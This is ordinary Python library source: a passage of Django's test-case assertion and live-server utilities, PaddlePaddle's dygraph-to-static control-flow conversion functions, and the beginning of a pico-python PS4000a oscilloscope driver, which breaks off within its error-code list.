rendering and hasn't been rendered # yet, then ensure that it does get rendered before proceeding further. if (hasattr(response, 'render') and callable(response.render) and not response.is_rendered): response.render() if msg_prefix: msg_prefix += ": " self.assertEqual(response.status_code, status_code, msg_prefix + "Couldn't retrieve content: Response code was %d" " (expected %d)" % (response.status_code, status_code)) if response.streaming: content = b''.join(response.streaming_content) else: content = response.content if not isinstance(text, bytes) or html: text = force_text(text, encoding=response._charset) content = content.decode(response._charset) text_repr = "'%s'" % text else: text_repr = repr(text) if html: content = assert_and_parse_html(self, content, None, "Response's content is not valid HTML:") text = assert_and_parse_html(self, text, None, "Second argument is not valid HTML:") real_count = content.count(text) if count is not None: self.assertEqual(real_count, count, msg_prefix + "Found %d instances of %s in response" " (expected %d)" % (real_count, text_repr, count)) else: self.assertTrue(real_count != 0, msg_prefix + "Couldn't find %s in response" % text_repr) def assertNotContains(self, response, text, status_code=200, msg_prefix='', html=False): """ Asserts that a response indicates that some content was retrieved successfully, (i.e., the HTTP status code was as expected), and that ``text`` doesn't occurs in the content of the response. """ # If the response supports deferred rendering and hasn't been rendered # yet, then ensure that it does get rendered before proceeding further. if (hasattr(response, 'render') and callable(response.render) and not response.is_rendered): response.render() if msg_prefix: msg_prefix += ": " self.assertEqual(response.status_code, status_code, msg_prefix + "Couldn't retrieve content: Response code was %d" " (expected %d)" % (response.status_code, status_code)) content = response.content if not isinstance(text, bytes) or html: text = force_text(text, encoding=response._charset) content = content.decode(response._charset) text_repr = "'%s'" % text else: text_repr = repr(text) if html: content = assert_and_parse_html(self, content, None, 'Response\'s content is not valid HTML:') text = assert_and_parse_html(self, text, None, 'Second argument is not valid HTML:') self.assertEqual(content.count(text), 0, msg_prefix + "Response should not contain %s" % text_repr) def assertFormError(self, response, form, field, errors, msg_prefix=''): """ Asserts that a form used to render the response has a specific field error. """ if msg_prefix: msg_prefix += ": " # Put context(s) into a list to simplify processing. contexts = to_list(response.context) if not contexts: self.fail(msg_prefix + "Response did not use any contexts to " "render the response") # Put error(s) into a list to simplify processing. errors = to_list(errors) # Search all contexts for the error. found_form = False for i,context in enumerate(contexts): if form not in context: continue found_form = True for err in errors: if field: if field in context[form].errors: field_errors = context[form].errors[field] self.assertTrue(err in field_errors, msg_prefix + "The field '%s' on form '%s' in" " context %d does not contain the error '%s'" " (actual errors: %s)" % (field, form, i, err, repr(field_errors))) elif field in context[form].fields: self.fail(msg_prefix + "The field '%s' on form '%s'" " in context %d contains no errors" % (field, form, i)) else: self.fail(msg_prefix + "The form '%s' in context %d" " does not contain the field '%s'" % (form, i, field)) else: non_field_errors = context[form].non_field_errors() self.assertTrue(err in non_field_errors, msg_prefix + "The form '%s' in context %d does not" " contain the non-field error '%s'" " (actual errors: %s)" % (form, i, err, non_field_errors)) if not found_form: self.fail(msg_prefix + "The form '%s' was not used to render the" " response" % form) def assertTemplateUsed(self, response=None, template_name=None, msg_prefix=''): """ Asserts that the template with the provided name was used in rendering the response. Also usable as context manager. """ if response is None and template_name is None: raise TypeError('response and/or template_name argument must be provided') if msg_prefix: msg_prefix += ": " # Use assertTemplateUsed as context manager. if not hasattr(response, 'templates') or (response is None and template_name): if response: template_name = response response = None context = _AssertTemplateUsedContext(self, template_name) return context template_names = [t.name for t in response.templates] if not template_names: self.fail(msg_prefix + "No templates used to render the response") self.assertTrue(template_name in template_names, msg_prefix + "Template '%s' was not a template used to render" " the response. Actual template(s) used: %s" % (template_name, ', '.join(template_names))) def assertTemplateNotUsed(self, response=None, template_name=None, msg_prefix=''): """ Asserts that the template with the provided name was NOT used in rendering the response. Also usable as context manager. """ if response is None and template_name is None: raise TypeError('response and/or template_name argument must be provided') if msg_prefix: msg_prefix += ": " # Use assertTemplateUsed as context manager. if not hasattr(response, 'templates') or (response is None and template_name): if response: template_name = response response = None context = _AssertTemplateNotUsedContext(self, template_name) return context template_names = [t.name for t in response.templates] self.assertFalse(template_name in template_names, msg_prefix + "Template '%s' was used unexpectedly in rendering" " the response" % template_name) def assertQuerysetEqual(self, qs, values, transform=repr, ordered=True): items = six.moves.map(transform, qs) if not ordered: return self.assertEqual(set(items), set(values)) values = list(values) # For example qs.iterator() could be passed as qs, but it does not # have 'ordered' attribute. if len(values) > 1 and hasattr(qs, 'ordered') and not qs.ordered: raise ValueError("Trying to compare non-ordered queryset " "against more than one ordered values") return self.assertEqual(list(items), values) def assertNumQueries(self, num, func=None, *args, **kwargs): using = kwargs.pop("using", DEFAULT_DB_ALIAS) conn = connections[using] context = _AssertNumQueriesContext(self, num, conn) if func is None: return context with context: func(*args, **kwargs) def connections_support_transactions(): """ Returns True if all connections support transactions. """ return all(conn.features.supports_transactions for conn in connections.all()) class TestCase(TransactionTestCase): """ Does basically the same as TransactionTestCase, but surrounds every test with a transaction, monkey-patches the real transaction management routines to do nothing, and rollsback the test transaction at the end of the test. You have to use TransactionTestCase, if you need transaction management inside a test. """ def _fixture_setup(self): if not connections_support_transactions(): return super(TestCase, self)._fixture_setup() assert not self.reset_sequences, 'reset_sequences cannot be used on TestCase instances' self.atomics = {} for db_name in self._databases_names(): self.atomics[db_name] = transaction.atomic(using=db_name) self.atomics[db_name].__enter__() # Remove this when the legacy transaction management goes away. disable_transaction_methods() for db in self._databases_names(include_mirrors=False): if hasattr(self, 'fixtures'): call_command('loaddata', *self.fixtures, **{ 'verbosity': 0, 'commit': False, 'database': db, 'skip_validation': True, }) def _fixture_teardown(self): if not connections_support_transactions(): return super(TestCase, self)._fixture_teardown() # Remove this when the legacy transaction management goes away. restore_transaction_methods() for db_name in reversed(self._databases_names()): # Hack to force a rollback connections[db_name].needs_rollback = True self.atomics[db_name].__exit__(None, None, None) def _deferredSkip(condition, reason): def decorator(test_func): if not (isinstance(test_func, type) and issubclass(test_func, TestCase)): @wraps(test_func) def skip_wrapper(*args, **kwargs): if condition(): raise ut2.SkipTest(reason) return test_func(*args, **kwargs) test_item = skip_wrapper else: test_item = test_func test_item.__unittest_skip_why__ = reason return test_item return decorator def skipIfDBFeature(feature): """ Skip a test if a database has the named feature """ return _deferredSkip(lambda: getattr(connection.features, feature), "Database has feature %s" % feature) def skipUnlessDBFeature(feature): """ Skip a test unless a database has the named feature """ return _deferredSkip(lambda: not getattr(connection.features, feature), "Database doesn't support feature %s" % feature) class QuietWSGIRequestHandler(WSGIRequestHandler): """ Just a regular WSGIRequestHandler except it doesn't log to the standard output any of the requests received, so as to not clutter the output for the tests' results. """ def log_message(*args): pass if sys.version_info >= (3, 3, 0): _ImprovedEvent = threading.Event elif sys.version_info >= (2, 7, 0): _ImprovedEvent = threading._Event else: class _ImprovedEvent(threading._Event): """ Does the same as `threading.Event` except it overrides the wait() method with some code borrowed from Python 2.7 to return the set state of the event (see: http://hg.python.org/cpython/rev/b5aa8aa78c0f/). This allows to know whether the wait() method exited normally or because of the timeout. This class can be removed when Django supports only Python >= 2.7. """ def wait(self, timeout=None): self._Event__cond.acquire() try: if not self._Event__flag: self._Event__cond.wait(timeout) return self._Event__flag finally: self._Event__cond.release() class StoppableWSGIServer(WSGIServer): """ The code in this class is borrowed from the `SocketServer.BaseServer` class in Python 2.6. The important functionality here is that the server is non- blocking and that it can be shut down at any moment. This is made possible by the server regularly polling the socket and checking if it has been asked to stop. Note for the future: Once Django stops supporting Python 2.6, this class can be removed as `WSGIServer` will have this ability to shutdown on demand and will not require the use of the _ImprovedEvent class whose code is borrowed from Python 2.7. """ def __init__(self, *args, **kwargs): super(StoppableWSGIServer, self).__init__(*args, **kwargs) self.__is_shut_down = _ImprovedEvent() self.__serving = False def serve_forever(self, poll_interval=0.5): """ Handle one request at a time until shutdown. Polls for shutdown every poll_interval seconds. """ self.__serving = True self.__is_shut_down.clear() while self.__serving: r, w, e = select.select([self], [], [], poll_interval) if r: self._handle_request_noblock() self.__is_shut_down.set() def shutdown(self): """ Stops the serve_forever loop. Blocks until the loop has finished. This must be called while serve_forever() is running in another thread, or it will deadlock. """ self.__serving = False if not self.__is_shut_down.wait(2): raise RuntimeError( "Failed to shutdown the live test server in 2 seconds. The " "server might be stuck or generating a slow response.") def handle_request(self): """Handle one request, possibly blocking. """ fd_sets = select.select([self], [], [], None) if not fd_sets[0]: return self._handle_request_noblock() def _handle_request_noblock(self): """ Handle one request, without blocking. I assume that select.select has returned that the socket is readable before this function was called, so there should be no risk of blocking in get_request(). """ try: request, client_address = self.get_request() except socket.error: return if self.verify_request(request, client_address): try: self.process_request(request, client_address) except Exception: self.handle_error(request, client_address) self.close_request(request) class _MediaFilesHandler(StaticFilesHandler): """ Handler for serving the media files. This is a private class that is meant to be used solely as a convenience by LiveServerThread. """ def get_base_dir(self): return settings.MEDIA_ROOT def get_base_url(self): return settings.MEDIA_URL def serve(self, request): relative_url = request.path[len(self.base_url[2]):] return serve(request, relative_url, document_root=self.get_base_dir()) class LiveServerThread(threading.Thread): """ Thread for running a live http server while the tests are running. """ def __init__(self, host, possible_ports, connections_override=None): self.host = host self.port = None self.possible_ports = possible_ports self.is_ready = threading.Event() self.error = None self.connections_override = connections_override super(LiveServerThread, self).__init__() def run(self): """ Sets up the live server and databases, and then loops over handling http requests. """ if self.connections_override: # Override this thread's database connections with the ones # provided by the main thread. for alias, conn in self.connections_override.items(): connections[alias] = conn try: # Create the handler for serving static and media files handler = StaticFilesHandler(_MediaFilesHandler(WSGIHandler())) # Go through the list of possible ports, hoping that we can find # one that is free to use for the WSGI server. for index, port in enumerate(self.possible_ports): try: self.httpd = StoppableWSGIServer( (self.host, port), QuietWSGIRequestHandler) except WSGIServerException as e: if (index + 1 < len(self.possible_ports) and hasattr(e.args[0], 'errno') and e.args[0].errno == errno.EADDRINUSE): # This port is already in use, so we go on and try with # the next one in the list. continue else: # Either none of the given ports are free or the error # is something else than "Address already in use". So # we let that error bubble up to the main thread. raise else: # A free port was found. self.port = port break self.httpd.set_app(handler) self.is_ready.set() self.httpd.serve_forever() except Exception as e: self.error = e self.is_ready.set() def join(self, timeout=None): if hasattr(self, 'httpd'): # Stop the WSGI server self.httpd.shutdown() self.httpd.server_close() super(LiveServerThread, self).join(timeout) class LiveServerTestCase(TransactionTestCase): """ Does basically the same as TransactionTestCase but also launches a live http server in a separate thread so that the tests may use another testing framework, such as Selenium for example, instead of the built-in dummy client. Note that it inherits from TransactionTestCase instead of TestCase because the threads do not share the same transactions (unless if using in-memory sqlite) and each thread needs to commit all their transactions so that the other thread can see the changes. """ @property def live_server_url(self): return 'http://%s:%s' % ( self.server_thread.host, self.server_thread.port) @classmethod def setUpClass(cls): connections_override = {} for conn in connections.all(): # If using in-memory sqlite databases, pass the connections to # the server thread. if (conn.settings_dict['ENGINE'].rsplit('.', 1)[-1] in ('sqlite3', 'spatialite') and conn.settings_dict['NAME'] == ':memory:'): # Explicitly enable thread-shareability for this connection conn.allow_thread_sharing = True connections_override[conn.alias] = conn # Launch the live server's thread specified_address = os.environ.get( 'DJANGO_LIVE_TEST_SERVER_ADDRESS', 'localhost:8081') # The specified ports may be of the form '8000-8010,8080,9200-9300' # i.e. a comma-separated list of ports or ranges of ports, so we break # it down into a detailed list of all possible ports. possible_ports = [] try: host, port_ranges = specified_address.split(':') for port_range in port_ranges.split(','): # A port range can be of either form: '8000' or '8000-8010'. extremes = list(map(int, port_range.split('-'))) assert len(extremes) in [1, 2] if len(extremes) == 1: # Port range of the form '8000' possible_ports.append(extremes[0]) else: # Port range of the form '8000-8010' for port in range(extremes[0], extremes[1] + 1): possible_ports.append(port) except Exception: msg = 'Invalid address ("%s") for live server.' % specified_address six.reraise(ImproperlyConfigured, ImproperlyConfigured(msg), sys.exc_info()[2]) cls.server_thread = LiveServerThread( host, possible_ports, connections_override) cls.server_thread.daemon = True cls.server_thread.start() # Wait for the live server to be ready cls.server_thread.is_ready.wait() if cls.server_thread.error: raise cls.server_thread.error super(LiveServerTestCase, cls).setUpClass() @classmethod def tearDownClass(cls): # There may not be a 'server_thread' attribute if setUpClass() for some # reasons has raised an exception. if hasattr(cls, 'server_thread'): # Terminate the live server's thread cls.server_thread.join() # Restore sqlite connections' non-sharability for conn in connections.all(): if (conn.settings_dict['ENGINE'].rsplit('.', 1)[-1] in ('sqlite3', 'spatialite') and conn.settings_dict['NAME'] == ':memory:'): conn.allow_thread_sharing = False super(LiveServerTestCase, cls).tearDownClass()
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from paddle.fluid.data_feeder import convert_dtype from paddle.fluid.dygraph.dygraph_to_static.variable_trans_func import to_static_variable from paddle.fluid.framework import core, Variable from paddle.fluid.layers import Assert, Print from paddle.fluid.layers import array_length, array_read, array_write, create_array from paddle.fluid.layers import assign, fill_constant, slice, reduce_all, reduce_any from paddle.fluid.layers import cast, control_flow, logical_and, logical_not, logical_or, nn from paddle.fluid.layers.control_flow import cond, while_loop, less_than, increment from paddle.fluid.dygraph.dygraph_to_static.return_transformer import RETURN_NO_VALUE_VAR_NAME def convert_while_loop(cond, body, loop_vars): """ A function representation of a Python ``while`` statement. Args: cond(Callable): A callable object that returns a boolean variable to control whether to execute the loop body. It takes ``loop_vars`` as arguments. body(Callable): A callable object that returns a tuple or list of variables with the same arguments ``loops_vars`` as ``cond`` . loop_vars(list|tuple): A list or tuple of variables passed to ``cond`` and ``body`` . Returns: A list or tuple of variables which returned by ``body``. """ # NOTE: It may be slower if cond is very expensive, but usually cond is just O(1). # If loop_vars is changed during cond callable, then it causes bug, but current logical_and/logical_not/... doesn't change the loop_vars. pred = cond(*loop_vars) if isinstance(pred, Variable): loop_vars = _run_paddle_while_loop(cond, body, loop_vars) else: loop_vars = _run_py_while(cond, body, loop_vars) return loop_vars def _run_paddle_while_loop(cond, body, loop_vars): # NOTE: loop_vars of Paddle op `control_flow.while_loop` must be Paddle Tensors. loop_vars = [to_static_variable(var) for var in loop_vars] loop_vars = control_flow.while_loop(cond, body, loop_vars) return loop_vars def _run_py_while(cond, body, loop_vars): while cond(*loop_vars): loop_vars = body(*loop_vars) return loop_vars def convert_logical_and(x_func, y_func): """ A function representation of a Python ``and`` statement. Args: x_func(callable): x_func() is the left hand operand of ``and`` operator. x_func() is bool or Tensor. y_func(callable): y_func() is the right hand operand of ``and`` operator. y_func() is bool or Tensor. Returns: A python bool variable or a bool Tensor. NOTE(liym27): 1) The operands are executed sequentially according to the running logic of Python. So here the arguments should be callable. 2) If the left hand operand is False, the right hand operand should be executed. For example: a = x > 1 and y < 1 Transformed code: a = paddle.jit.dy2static.convert_logical_and(lambda:x>1, lambda:y<1) In `convert_logical_and(lambda:x>1, lambda:y<1)`, `lambda:y<1` must be run after `lambda:x>1`. And if `x>1` is False, `y<1` should NOT be run. """ x_value = x_func() if not isinstance(x_value, Variable): return _run_py_logical_and(lambda: x_value, y_func) y_value = y_func() if not isinstance(y_value, Variable): return _run_py_logical_and(lambda: y_value, lambda: x_value) return _run_paddle_logical_and(x_value, y_value) def _run_paddle_logical_and(x, y): x = cast_bool_if_necessary(x) y = cast_bool_if_necessary(y) return logical_and(x, y) def _run_py_logical_and(x_func, y_func): x_value = x_func() assert not isinstance(x_value, Variable) # NOTE(liym27): # 1. Returns y_func() if x_value is False; # 2. If x_value is False, y_func() should not be run. return x_value and y_func() def convert_logical_or(x_func, y_func): """ A function representation of a Python ``or`` statement. Args: x_func(callable): x_func() is the left hand operand of ``or`` operator. x_func() is bool or Tensor. y_func(callable): y_func() is the right hand operand of ``or`` operator. y_func() is bool or Tensor. Returns: A python bool variable or a bool Tensor. NOTE(liym27): 1) The operands are executed sequentially according to the running logic of Python. So here the arguments should be callable. 2) If the left hand operand is True, the right hand operand should be executed. For example: a = x > 1 or y < 1 Transformed code: a = paddle.jit.dy2static.convert_logical_or(lambda:x>1, lambda:y<1) In `convert_logical_or(lambda:x>1, lambda:y<1)`, `lambda:y<1` must be run after `lambda:x>1`. And if `x>1` is True, `y<1` should NOT be run. """ x_value = x_func() if not isinstance(x_value, Variable): return _run_py_logical_or(lambda: x_value, y_func) y_value = y_func() if not isinstance(y_value, Variable): return _run_py_logical_or(lambda: y_value, lambda: x_value) return _run_paddle_logical_or(x_value, y_value) def _run_paddle_logical_or(x, y): x = cast_bool_if_necessary(x) y = cast_bool_if_necessary(y) return logical_or(x, y) def _run_py_logical_or(x_func, y_func): x_value = x_func() assert not isinstance(x_value, Variable) # NOTE(liym27): # 1. Returns y_func() if x_value is False; # 2. If x_value is True, y_func() should not be run. return x_value or y_func() def convert_logical_not(x): """ A function representation of a Python ``not`` statement. Args: x(bool|Tensor): Operand of of ``not`` operator. Returns: A python bool variable or a bool Tensor. """ if isinstance(x, Variable): return _run_paddle_logical_not(x) else: return _run_py_logical_not(x) def _run_paddle_logical_not(x): x = cast_bool_if_necessary(x) return logical_not(x) def _run_py_logical_not(x): return not x def convert_ifelse(pred, true_fn, false_fn, true_args, false_args, return_vars): """ A function representation of a Python ``if/else`` statement. Args: pred(bool|Tensor): A boolean Tensor which determines whether to return the result of ``true_fn`` or ``false_fn`` . true_fn(callable): A callable to be performed if ``pred`` is true. false_fn(callable): A callable to be performed if ``pred`` is false. true_args(tuple): Parameters of ``true_fn``. false_args(tuple): Parameters of ``false_fn``. return_vars(tuple): Return variables of ``true_fn`` and ``false_fn``. Returns: ``true_fn(true_args)`` if the predicate ``pred`` is true else ``false_fn(false_args)`` . """ if isinstance(pred, Variable): out = _run_paddle_cond(pred, true_fn, false_fn, true_args, false_args, return_vars) else: out = _run_py_ifelse(pred, true_fn, false_fn, true_args, false_args) return _remove_no_value_return_var(out) def _remove_no_value_return_var(out): if isinstance(out, tuple) and len(out) > 0: processed_out = out align_ret = out[0] if isinstance(align_ret, tuple): for index, item in enumerate(align_ret): if isinstance(item, Variable) and ( RETURN_NO_VALUE_VAR_NAME in item.name): # return None if index == 0: processed_out = (None, ) + out[1:] elif index == 1: processed_out = align_ret[:1] + out[1:] else: processed_out = (align_ret[:index], ) + out[1:] break for index, item in enumerate(processed_out): if isinstance(item, Variable) and ( RETURN_NO_VALUE_VAR_NAME in item.name): processed_out = processed_out[:index] if not processed_out: return None elif len(processed_out) == 1: return processed_out[0] else: return processed_out else: return out def _run_paddle_cond(pred, true_fn, false_fn, true_args, false_args, return_vars): pred = cast_bool_if_necessary(pred) return control_flow.cond(pred, lambda: true_fn(*true_args), lambda: false_fn(*false_args)) def _run_py_ifelse(pred, true_fn, false_fn, true_args, false_args): return true_fn(*true_args) if pred else false_fn(*false_args) def convert_len(var): """ Returns variable(length) from shape ops based on var.type Note: In addition to some ast transformations, some block-related operations are added in `len` transformation, such as appending `shape_op` in var.block. """ if isinstance(var, Variable): if var.type in [ core.VarDesc.VarType.LOD_TENSOR, core.VarDesc.VarType.SELECTED_ROWS ]: # Note: Length of var may be known ahead of time in dygraph, # but it probably represents batch size which can be variant. # so we return a variable dynamically inferred from var.shape. return nn.shape(var)[0] elif var.type == core.VarDesc.VarType.LOD_TENSOR_ARRAY: return control_flow.array_length(var) else: raise TypeError( 'len(var) only supports LoDTensor/LoDTensorArray/SelectedRows, but received %s.' % type(var)) else: return len(var) def convert_zip(*args): for i, arg in enumerate(args): if isinstance(arg, Variable) and arg.shape[0] == -1: raise RuntimeError( "Not support zip(tensor, ...) when tensor.shape[0] == -1, " "but found args[{}].shape[0] == -1 in 'zip'".format(str(i))) return zip(*args) def convert_var_shape(x, idx=None, in_control_flow=False): """ A function representation of the shape of variable. """ def has_negative(list_shape, idx=None): if idx is not None: return list_shape[idx] < 0 num_negative = sum([1 if i < 0 else 0 for i in list_shape]) return num_negative > 0 # When `x` is Variable, call nn.shape(x) in following cases: # (1) The shape of `x` is used in control flow condition. # ``` # if x.shape[0] == 1: # y = XX # ``` # (2) The dim to be used is negative # ``` # # Assume x.shape=[3, -1] in static mode # y = paddle.reshape(x, shape=[1, x.shape[1]]) # ``` if isinstance(x, Variable) and (in_control_flow or has_negative(x.shape, idx)): return nn.shape(x) if idx is None else nn.shape(x)[idx] else: return x.shape if idx is None else x.shape[idx] def convert_var_shape_simple(x): """ A function representation of the shape of variable. """ if isinstance(x, Variable): return nn.shape(x) else: return x.shape def eval_if_exist_else_none(name, global_symbol_table): """ Args: name([str]): Expression passed into `eval`. local_symbol_table(dict): Specified from `globals()`. DO NOT use `locals()`, because all STATIC_CONVERT_VAR_SHAPE_SUFFIX vars is declared with keyword `global`. Returns: Return the variable if found in global_symbol_table else None. """ try: return eval(name, global_symbol_table) except: return None def choose_shape_attr_or_api(attr_shape, api_shape, idx=None): """ Input can be attribute `x.shape` or api `shape(x)`, this function chooses which one to return to use in dy2stat. Note: sometimes users write `x.shape[3]`, so attr_shape can be an integer. """ if api_shape is None: return attr_shape if idx is None else attr_shape[idx] if not isinstance(attr_shape, (list, tuple)): # some variables like x.shape[0] is no longer a list or tuple if isinstance(attr_shape, int) and attr_shape < 0: return api_shape if idx is None else api_shape[idx] return attr_shape if idx is None else attr_shape[idx] def has_negative(list_shape, idx=None): if idx is not None: return list_shape[idx] < 0 num_negative = sum([1 if i < 0 else 0 for i in list_shape]) return num_negative > 0 if has_negative(attr_shape, idx): return api_shape if idx is None else api_shape[idx] return attr_shape if idx is None else attr_shape[idx] def convert_shape_compare(left, *args): """ A function handles comparison difference between Paddle and Python. For example, if x and y are Tensors, x.shape == y.shape will return single boolean Value (True/False). However, paddle.shape(x) == paddle.shape(y) is an element-wise comparison. The difference can cause dy2stat error. So we create this function to handle the difference. Args: left: variable *args: compare_op(str), variable, compare_op(str), variable, where compare_op means "<", ">", "==", "!=", etc. Returns: If the variables to compare are NOT Paddle Variables, we will return as Python like "a op1 b and b op2 c and ... ". If the variables to compare are Paddle Variables, we will do elementwise comparsion first and then reduce to a boolean whose numel is 1. """ args_len = len(args) assert args_len >= 2, "convert_shape_compare needs at least one right compare variable" assert args_len % 2 == 0, "Illegal input for convert_shape_compare, *args should be op(str), var, op(str), var ..." num_cmp = args_len // 2 if isinstance(left, Variable): def reduce_compare(x, op_str, y): element_wise_result = eval("x " + op_str + " y") if op_str == "!=": return reduce_any(element_wise_result) elif op_str == "is" or op_str == "is not" or op_str == "in" or op_str == "not in": return element_wise_result else: return reduce_all(element_wise_result) final_result = reduce_compare(left, args[0], args[1]) for i in range(1, num_cmp): cmp_left = args[i * 2 - 1] cmp_op = args[i * 2] cmp_right = args[i * 2 + 1] cur_result = reduce_compare(cmp_left, cmp_op, cmp_right) final_result = convert_logical_and(lambda: final_result, lambda: cur_result) return final_result else: cmp_left = left final_result = None for i in range(num_cmp): cmp_op = args[i * 2] cmp_right = args[i * 2 + 1] cur_result = eval("cmp_left " + cmp_op + " cmp_right") if final_result is None: final_result = cur_result else: final_result = final_result and cur_result if final_result is False: return False cmp_left = cmp_right return final_result def cast_bool_if_necessary(var): assert isinstance(var, Variable) if convert_dtype(var.dtype) not in ['bool']: var = cast(var, dtype="bool") return var def convert_var_dtype(var, dtype): if isinstance(var, Variable): src_dtype = convert_dtype(var.dtype) assert src_dtype in [ 'bool', 'float16', 'float32', 'float64', 'int32', 'int64', 'uint8' ], "The dtype of var {} is {}, which is not supported in the cast op.".format( var.name, src_dtype) assert dtype in [ 'bool', 'int', 'float' ], "The casted target dtype is {}, which is not supported in type casting.".format( dtype) cast_map = { 'bool': 'bool', 'int': 'int32', 'float': 'float32', } return cast(var, dtype=cast_map[dtype]) else: return eval('{}(var)'.format(dtype)) def convert_assert(cond, message=""): """ A function representation of a Python ``assert`` statement. """ if isinstance(cond, Variable): cond = cast(cond, "bool") # NOTE: message is not used because Paddle Assert has no corresponding parameter to use. return Assert(cond) else: assert cond, message def convert_print(*args): """ A function representing Python ``print`` statement. Note: this is a basic python function so we haven't handle sep, end, file and flush parameters of python function. """ for var in args: if isinstance(var, Variable): var = Print(var) else: print(var) def convert_pop(target, *args): """ A function representation of a Python pop statement for a list or dict. Args: target(list|dict|Tensor): A variable to pop item from. *args(tuple): index or default value to parse. Returns: A item poped from target. """ is_variable = isinstance(target, Variable) if is_variable: is_tensor_array = target.type == core.VarDesc.VarType.LOD_TENSOR_ARRAY if is_variable and is_tensor_array: return _run_paddle_pop(target, *args) else: return _run_python_pop(target, *args) def _run_paddle_pop(array, *args): if len(args) == 0: idx = -1 else: idx = args[0] assert isinstance(idx, int) def cond(i, new_array): return less_than(i, arr_len) def body(i, new_array): item = array_read(array=array, i=i) array_write(item, array_length(new_array), new_array) i = increment(i) return i, new_array arr_len = array_length(array) if idx < 0: idx = idx + arr_len else: idx = fill_constant(shape=[1], dtype="int64", value=idx) pop_item = array_read(array, idx) new_array = _slice_tensor_array(array, 0, idx) i = idx + 1 _, new_array = while_loop(cond, body, [i, new_array]) assign(input=new_array, output=array) return pop_item # TODO(liym27): A better way to slice tensor array. # Maybe support start == end for slice op. def _slice_tensor_array(array, start, end): def true_fn(): null_array = create_array("float32") return null_array def false_fn(array, start, end): new_array = slice(array, starts=[start], ends=[end], axes=[0]) return new_array new_array = cond(start == end, true_fn, lambda: false_fn(array, start, end)) return new_array def _run_python_pop(target, *args): # 1. pop for a dict if len(args) == 2: idx, default = args return target.pop(idx, default) # 2. pop for a list or dict else: idx = args[0] if args else -1 return target.pop(idx)
# This is the instrument-specific file for the PS3000a series of instruments. # # pico-python is Copyright (c) 2013-2014 By: # Colin O'Flynn <coflynn@newae.com> # Mark Harfouche <mark.harfouche@gmail.com> # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. """ This is the low level driver file for a specific Picoscope. By this, I mean if parameters want to get passed as strings, they should be handled by PSBase All functions here should take things as close to integers as possible, the only exception here is for array parameters. Array parameters should be passed in a pythonic way through numpy since the PSBase class should not be aware of the specifics behind how the clib is called. The functions should not have any default values as these should be handled by PSBase. """ from __future__ import division from __future__ import absolute_import from __future__ import print_function from __future__ import unicode_literals import string import inspect # to load the proper dll import platform # Do not import or use ill definied data types # such as short int or long # use the values specified in the h file # float is always defined as 32 bits # double is defined as 64 bits from ctypes import byref, POINTER, create_string_buffer, c_float, \ c_int16, c_int32, c_uint32, c_void_p, c_int8, c_double from ctypes import c_int32 as c_enum from picoscope.picobase import _PicoscopeBase class PS4000a(_PicoscopeBase): """The following are low-level functions for the PS4000a""" LIBNAME = "ps4000a" NUM_CHANNELS = 8 CHANNELS = dict(zip(string.ascii_uppercase[0:NUM_CHANNELS], range(NUM_CHANNELS))) CHANNEL_RANGE = [ {"rangeV": 10E-3, "apivalue": 0, "rangeStr": "10 mV"}, {"rangeV": 20E-3, "apivalue": 1, "rangeStr": "20 mV"}, {"rangeV": 50E-3, "apivalue": 2, "rangeStr": "50 mV"}, {"rangeV": 100E-3, "apivalue": 3, "rangeStr": "100 mV"}, {"rangeV": 200E-3, "apivalue": 4, "rangeStr": "200 mV"}, {"rangeV": 500E-3, "apivalue": 5, "rangeStr": "500 mV"}, {"rangeV": 1.0, "apivalue": 6, "rangeStr": "1 V"}, {"rangeV": 2.0, "apivalue": 7, "rangeStr": "2 V"}, {"rangeV": 5.0, "apivalue": 8, "rangeStr": "5 V"}, {"rangeV": 10.0, "apivalue": 9, "rangeStr": "10 V"}, {"rangeV": 20.0, "apivalue": 10, "rangeStr": "20 V"}, {"rangeV": 50.0, "apivalue": 11, "rangeStr": "50 V"}, {"rangeV": 100.0, "apivalue": 12, "rangeStr": "100 V"}, {"rangeV": 200.0, "apivalue": 13, "rangeStr": "200 V"} ] ERROR_CODES = [[0x00, "PICO_OK", "The PicoScope XXXX is functioning correctly."], [0x01, "PICO_MAX_UNITS_OPENED", "An attempt has been made to open more than PS3000_MAX_UNITS."], [0x02, "PICO_MEMORY_FAIL", "Not enough memory could be allocated on the host machine."], [0x03, "PICO_NOT_FOUND", "No PicoScope XXXX could be found."], [0x04, "PICO_FW_FAIL", "Unable to download firmware."], [0x05, "PICO_OPEN_OPERATION_IN_PROGRESS", "?"], [0x06, "PICO_OPERATION_FAILED", "?"], [0x07, "PICO_NOT_RESPONDING", "The PicoScope XXXX is not responding to commands from the PC."], [0x08, "PICO_CONFIG_FAIL", "The configuration info has become corrupt or is missing"], [0x09, "PICO_KERNEL_DRIVER_TOO_OLD", "?"], [0x0A, "PICO_EEPROM_CORRUPT", "?"], [0x0B, 